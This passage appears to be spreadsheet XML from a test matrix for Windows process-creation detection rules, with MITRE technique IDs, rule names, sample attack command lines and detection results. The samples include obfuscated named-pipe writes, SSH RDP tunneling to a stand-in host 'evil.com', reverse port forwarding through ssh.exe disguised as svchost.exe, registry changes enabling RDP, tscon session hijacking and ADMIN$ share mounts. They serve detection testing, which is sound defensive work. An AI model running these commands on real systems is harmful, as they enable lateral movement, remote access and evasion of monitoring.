      <c r="C53" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D53" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E53" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C e^c^h^o data &gt; \\.\pipe\target_pipe</t>
        </is>
      </c>
      <c r="F53" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G53" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H53" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I53" s="43" t="n"/>
      <c r="J53" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K53" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B54" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C54" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D54" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E54" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" e^c^h^o data &gt; \\.\pipe\target_pipe</t>
        </is>
      </c>
      <c r="F54" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G54" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H54" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I54" s="43" t="n"/>
      <c r="J54" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K54" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B55" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C55" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D55" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E55" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" e^c^h^o data &gt; \\.\pipe\target_pipe</t>
        </is>
      </c>
      <c r="F55" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G55" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H55" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I55" s="43" t="n"/>
      <c r="J55" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K55" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B56" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C56" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D56" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E56" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Content -Path '\\.\pipe\target_pipe' -Value 'data'"</t>
        </is>
      </c>
      <c r="F56" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G56" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H56" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I56" s="43" t="n"/>
      <c r="J56" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K56" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B57" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C57" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D57" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E57" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnD "Set-Content -Path '\\.\pipe\target_pipe' -Value 'data'"</t>
        </is>
      </c>
      <c r="F57" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G57" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H57" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I57" s="43" t="n"/>
      <c r="J57" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K57" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B58" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C58" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D58" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E58" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMManD "Set-Content -Path '\\.\pipe\target_pipe' -Value 'data'"</t>
        </is>
      </c>
      <c r="F58" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G58" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H58" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I58" s="43" t="n"/>
      <c r="J58" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K58" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B59" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C59" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D59" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E59" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Content -Path '\\.\pipe\target_pipe' -Value 'data'"</t>
        </is>
      </c>
      <c r="F59" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G59" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H59" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I59" s="43" t="n"/>
      <c r="J59" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K59" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B60" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C60" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D60" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E60" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "Set-Content -Path '\\.\pipe\target_pipe' -Value 'data'"</t>
        </is>
      </c>
      <c r="F60" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G60" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H60" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I60" s="43" t="n"/>
      <c r="J60" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K60" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B61" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C61" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D61" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E61" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaND "Set-Content -Path '\\.\pipe\target_pipe' -Value 'data'"</t>
        </is>
      </c>
      <c r="F61" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G61" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H61" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I61" s="43" t="n"/>
      <c r="J61" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K61" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B62" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C62" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D62" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E62" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Set-Content -Path '\\.\pipe\target_pipe' -Value 'data'"</t>
        </is>
      </c>
      <c r="F62" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G62" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H62" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I62" s="43" t="n"/>
      <c r="J62" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K62" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="43" t="n"/>
      <c r="B63" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_remote_desktop_tunneling</t>
        </is>
      </c>
      <c r="C63" s="36" t="inlineStr">
        <is>
          <t>Potential Remote Desktop Tunneling</t>
        </is>
      </c>
      <c r="D63" s="36" t="inlineStr">
        <is>
          <t>8a3038e8-9c9d-46f8-b184-66234a160f6f</t>
        </is>
      </c>
      <c r="E63" s="36" t="inlineStr">
        <is>
          <t>ssh.exe -L8888:192.168.1.10:3389 user@evil.com</t>
        </is>
      </c>
      <c r="F63" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G63" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H63" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I63" s="36" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via SSH (f7d7ebd5-a016-46e2-9c54-f9932f2d386d)</t>
        </is>
      </c>
      <c r="J63" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K63" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="43" t="n"/>
      <c r="B64" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_remote_desktop_tunneling</t>
        </is>
      </c>
      <c r="C64" s="36" t="inlineStr">
        <is>
          <t>Potential Remote Desktop Tunneling</t>
        </is>
      </c>
      <c r="D64" s="36" t="inlineStr">
        <is>
          <t>8a3038e8-9c9d-46f8-b184-66234a160f6f</t>
        </is>
      </c>
      <c r="E64" s="36" t="inlineStr">
        <is>
          <t>ssh.exe -l8888:192.168.1.10:3389 user@evil.com</t>
        </is>
      </c>
      <c r="F64" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G64" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H64" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I64" s="36" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via SSH (f7d7ebd5-a016-46e2-9c54-f9932f2d386d)</t>
        </is>
      </c>
      <c r="J64" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K64" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="43" t="n"/>
      <c r="B65" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_remote_desktop_tunneling</t>
        </is>
      </c>
      <c r="C65" s="36" t="inlineStr">
        <is>
          <t>Potential Remote Desktop Tunneling</t>
        </is>
      </c>
      <c r="D65" s="36" t="inlineStr">
        <is>
          <t>8a3038e8-9c9d-46f8-b184-66234a160f6f</t>
        </is>
      </c>
      <c r="E65" s="36" t="inlineStr">
        <is>
          <t>ssh.exe -"L8888:192.168.1.10:3389" user@evil.com</t>
        </is>
      </c>
      <c r="F65" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G65" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H65" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I65" s="36" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via SSH (f7d7ebd5-a016-46e2-9c54-f9932f2d386d)</t>
        </is>
      </c>
      <c r="J65" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K65" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="43" t="n"/>
      <c r="B66" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_remote_desktop_tunneling</t>
        </is>
      </c>
      <c r="C66" s="36" t="inlineStr">
        <is>
          <t>Potential Remote Desktop Tunneling</t>
        </is>
      </c>
      <c r="D66" s="36" t="inlineStr">
        <is>
          <t>8a3038e8-9c9d-46f8-b184-66234a160f6f</t>
        </is>
      </c>
      <c r="E66" s="36" t="inlineStr">
        <is>
          <t>ssh.exe /"L8888:192.168.1.10:3389" user@evil.com</t>
        </is>
      </c>
      <c r="F66" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G66" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H66" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I66" s="36" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via SSH (f7d7ebd5-a016-46e2-9c54-f9932f2d386d)</t>
        </is>
      </c>
      <c r="J66" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K66" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="36" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B67" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_remote_connection</t>
        </is>
      </c>
      <c r="C67" s="36" t="inlineStr">
        <is>
          <t>New Remote Desktop Connection Initiated Via Mstsc.EXE</t>
        </is>
      </c>
      <c r="D67" s="36" t="inlineStr">
        <is>
          <t>954f0af7-62dd-418f-b3df-a84bc2c7a774</t>
        </is>
      </c>
      <c r="E67" s="36" t="inlineStr">
        <is>
          <t>mstsc.exe C:\path\to\connection.rdp</t>
        </is>
      </c>
      <c r="F67" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G67" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H67" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I67" s="36" t="inlineStr">
        <is>
          <t>Mstsc.EXE Execution With Local RDP File (5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af)</t>
        </is>
      </c>
      <c r="J67" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K67" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="43" t="n"/>
      <c r="B68" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C68" s="36" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D68" s="36" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E68" s="36" t="inlineStr">
        <is>
          <t>echo Y | reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F68" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G68" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H68" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I68" s="43" t="n"/>
      <c r="J68" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K68" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="43" t="n"/>
      <c r="B69" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C69" s="36" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D69" s="36" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E69" s="36" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F69" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G69" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H69" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I69" s="43" t="n"/>
      <c r="J69" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K69" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="43" t="n"/>
      <c r="B70" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C70" s="36" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D70" s="36" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E70" s="36" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0/f</t>
        </is>
      </c>
      <c r="F70" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G70" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H70" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I70" s="43" t="n"/>
      <c r="J70" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K70" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="43" t="n"/>
      <c r="B71" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C71" s="36" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D71" s="36" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E71" s="36" t="inlineStr">
        <is>
          <t>ssh.exe -F ssh_config_with_forwarding.txt user@target</t>
        </is>
      </c>
      <c r="F71" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G71" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H71" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I71" s="43" t="n"/>
      <c r="J71" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K71" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="43" t="n"/>
      <c r="B72" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C72" s="36" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D72" s="36" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E72" s="36" t="inlineStr">
        <is>
          <t>ssh.exe -o "RemoteForward 8080 localhost:80" user@10.10.10.10</t>
        </is>
      </c>
      <c r="F72" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G72" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H72" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I72" s="43" t="n"/>
      <c r="J72" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K72" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
      <c r="A73" s="43" t="n"/>
      <c r="B73" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C73" s="36" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D73" s="36" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E73" s="36" t="inlineStr">
        <is>
          <t>ssh.exe -R8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F73" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G73" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H73" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I73" s="43" t="n"/>
      <c r="J73" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K73" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="43" t="n"/>
      <c r="B74" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C74" s="36" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D74" s="36" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E74" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -R 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F74" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G74" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H74" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I74" s="36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74" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K74" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="43" t="n"/>
      <c r="B75" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C75" s="36" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D75" s="36" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E75" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -r 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F75" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G75" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H75" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I75" s="36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75" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K75" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="43" t="n"/>
      <c r="B76" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C76" s="36" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D76" s="36" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E76" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe /"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F76" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G76" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H76" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I76" s="36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76" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K76" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="43" t="n"/>
      <c r="B77" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C77" s="36" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D77" s="36" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E77" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F77" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G77" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H77" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I77" s="36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77" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K77" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B78" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_tscon_rdp_redirect</t>
        </is>
      </c>
      <c r="C78" s="43" t="inlineStr">
        <is>
          <t>Suspicious RDP Redirect Using TSCON</t>
        </is>
      </c>
      <c r="D78" s="43" t="inlineStr">
        <is>
          <t>f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb</t>
        </is>
      </c>
      <c r="E78" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /k tscon 1337 -dest:rdp-tcp#55</t>
        </is>
      </c>
      <c r="F78" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G78" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H78" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I78" s="43" t="n"/>
      <c r="J78" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K78" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="36" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B79" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_tscon_rdp_redirect</t>
        </is>
      </c>
      <c r="C79" s="36" t="inlineStr">
        <is>
          <t>Suspicious RDP Redirect Using TSCON</t>
        </is>
      </c>
      <c r="D79" s="36" t="inlineStr">
        <is>
          <t>f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb</t>
        </is>
      </c>
      <c r="E79" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /k tscon 1337 "/dest:rdp-tcp#55"</t>
        </is>
      </c>
      <c r="F79" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G79" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H79" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I79" s="43" t="n"/>
      <c r="J79" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K79" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="43" t="n"/>
      <c r="B80" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_admin_share</t>
        </is>
      </c>
      <c r="C80" s="36" t="inlineStr">
        <is>
          <t>Windows Admin Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D80" s="36" t="inlineStr">
        <is>
          <t>3abd6094-7027-475f-9630-8ab9be7b9725</t>
        </is>
      </c>
      <c r="E80" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c pushd \\192.168.1.100\ADMIN$</t>
        </is>
      </c>
      <c r="F80" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G80" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H80" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I80" s="43" t="n"/>
      <c r="J80" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K80" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="43" t="n"/>
      <c r="B81" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_admin_share</t>
        </is>
      </c>
      <c r="C81" s="36" t="inlineStr">
        <is>
